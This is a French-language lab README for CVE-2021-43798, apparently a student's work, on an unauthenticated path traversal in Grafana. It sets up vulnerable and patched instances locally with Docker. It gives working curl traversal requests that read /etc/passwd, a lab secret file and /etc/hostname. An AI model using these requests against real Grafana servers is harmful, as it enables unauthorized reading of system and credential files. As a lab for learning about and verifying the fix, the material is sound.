
CVE-2021-43798 Grafana Traversée de chemin non authentifiée - Security Lab | Shivam Gupta | 23104003
Usage éducatif uniquement. Exécutez ce laboratoire uniquement sur une machine locale isolée. Ne l'exposez jamais à Internet.
| Champ | Détail |
|---|---|
| ID CVE | CVE-2021-43798 |
| Produit | Grafana |
| Versions affectées | 8.0.0 – 8.3.0 |
| Version corrigée | 8.3.1+ |
| Sévérité | Élevée |
| Score CVSS v3.1 | 7.5 |
| CWE | CWE-22 — Traversée de chemin |
| Authentification requise | Aucune |
| Vecteur d'attaque | Réseau |
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta
docker compose up -d
Vérifier :
curl http://127.0.0.1:3000/api/health
# Attendu : "version": "8.3.0"
Ouvrez http://127.0.0.1:3000 — identifiants : admin / admin
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"
Attendu : contenu du fichier renvoyé avec HTTP 200 — aucune authentification requise.
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health
Si le hostname est renvoyé → VULNÉRABLE. Version 8.0.0–8.3.0 → VULNÉRABLE.
Démarrer l'instance corrigée (Grafana 8.3.1) :
docker compose -f docker-compose.patched.yml up -d
Vérifier que l'exploit est bloqué :
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Attendu : {"message": "Plugin file not found"}
docker compose down
docker compose -f docker-compose.patched.yml down